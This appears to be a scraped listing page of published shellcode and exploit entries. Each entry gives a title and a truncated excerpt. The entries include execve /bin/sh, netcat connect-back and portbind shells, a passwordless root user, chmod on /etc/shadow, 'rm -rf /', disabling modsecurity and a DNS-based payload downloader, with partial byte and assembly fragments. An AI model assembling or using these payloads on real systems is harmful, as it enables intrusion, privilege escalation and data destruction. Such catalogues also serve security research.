HTTP Fetch, DNS TXT Record Payload Download and Execution

Fetch and execute an x86 payload from an HTTP server. Performs a TXT query against a series of DNS records and executes the returned x86 shellcode. The DNSZONE option is used as the base name to iterate over. The payload will first request the TXT contents of the a hostname, followed by b, then c...

Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)

Linux/x86 - execve/bin/sh Shellcode 18 bytes. Shellcode exploit for Linuxx86 platform / Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax...

Linux/x86 Remote Port Forwarding Shellcode 87 bytes

No description provided by source. / Linux/x86 Remote Port forwarding 87 bytes ssh -R 9999:localhost:22 192.168.0.226 Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom / xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 push...

Solaris 7.0/8 Xsun Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1140/info A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option normally used to set the output device, ...

Linux/x86 - Remote Port Forwarding Shellcode 87 bytes

Linux/x86 - Remote Port Forwarding Shellcode 87 bytes. Shellcode exploit for linx86 platform / Linux/x86 Remote Port forwarding 87 bytes ssh -R 9999:localhost:22 192.168.0.226 Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom / xor...

linux/x86 netcat connect back port 8080 76 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 netcat connect back port 8080 76 bytes ================================================ / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor...

linux/x86 - give all user root access when execute /bin/sh 45 bytes

45 bytes give all user root access when execute /bin/sh x86 linux shellcode. Shellcode exploit for linux platform / Name : 45 bytes give all user root access when execute /bin/sh x86 linux shellcode Date : Sat Jun 5 16:10:00 2010 Author : gunslinger Web : http://devilzc0de.org blog :...

linux/x86 sys_exit(0) shellcode 8 bytes

Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 sysexit0 shellcode 8 bytes ======================================= / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/...

Linux x86 - disabled modsecurity - 64 bytes

Linux x86 - disabled modsecurity - 64 bytes. Shellcode exploit for linx86 platform / [email protected] - Goodfellas Security Research Team - 2010 /usr/sbin/a2dismod mod-security2 - disable modsecurity 64 bytes asm "xor %eax,%eax \n" "push %eax \n" "cdq \n" "push $0x646f6d73 \n" "push...

linux/x86 unlink(/etc/passwd) & exit() 35 bytes

No description provided by source. Title: linux/x86 unlink/etc/passwd & exit 35 bytes Date: 2009-12-24 Author: sandman, n4mdn4s 4T gmail D0T com Tested on: linux/Fedora 12 Code : / unlinkpasswd.c Platform: linux/x86 Size: 35 bytes Author: $andman / include string.h include stdio.h char shell =...

freebsd/x86 portbind shellcode 167 bytes

No description provided by source. /- Copyright c 2009, Sofian Brabez [email protected] freebsd-x86-portbind.c - FreeBSD x86 portbind a shell /bin/sh on 1337 \x05\x39 167 bytes / const char shellcode = "\x6a\x00" // push $0x0 "\x6a\x01" // push $0x1 "\x6a\x02" // push $0x2 "\x50" // push %eax "\x6a\x6...

linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes

Exploit for linux/x86 platform in category shellcode ================================================================= linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes ================================================================= / Title : Linux/x86 - Shellcode Polymorphic...

Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)

Linux/x86 - execve/bin/sh Shellcode 23 bytes 2. Shellcode exploit for Linuxx86 platform Linux/x86 execve /bin/sh shellcode 23 bytes Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom xor %eax,%eax push %eax push $0x68732f2f push...

Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)

Linux/x86 - execve/bin/ash + exit Shellcode 34 bytes. Shellcode exploit for Linuxx86 platform / Linux x86 shellcode by bob from Dtors.net. execve/bin/ash; exit; Total = 34 bytes. / include char shellcode= "\x31\xc0\x50\x68\x2f\x61\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"...

OpenBSD/x86 - reboot() Shellcode (15 bytes)

OpenBSD/x86 - reboot Shellcode 15 bytes. Shellcode exploit for OpenBSDx86 platform // ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : [email protected] // [email protected] char shellcode =...

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux/x86 - Add Root User w000t + No Password Shellcode 177 bytes. Shellcode exploit for Linuxx86 platform Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : [email protected] Homepage: safemode.org File: w000t-shell.c / This shellcode...

linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes

Exploit for linux/x86 platform in category shellcode ============================================================ linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes ============================================================ -------------------ASM---------------------- global start section...

linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes

linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes. Shellcode exploit for linx86 platform ========================================================== linux x86 setresuid0,0,0-/bin/sh shellcode 35 bytes ========================================================== Shellcode by the FHM crew:...

linux/x86 setresuid(0 0 0) /bin/sh shellcode 35 bytes

No description provided by source. ========================================================== linux x86 setresuid0,0,0-/bin/sh shellcode 35 bytes ========================================================== Shellcode by the FHM crew: ---------------------------- http://fhm.noblogs.org...

linux/x86 execve(rm -rf /) shellcode 45 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 execverm -rf / shellcode 45 bytes ============================================= / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global sta...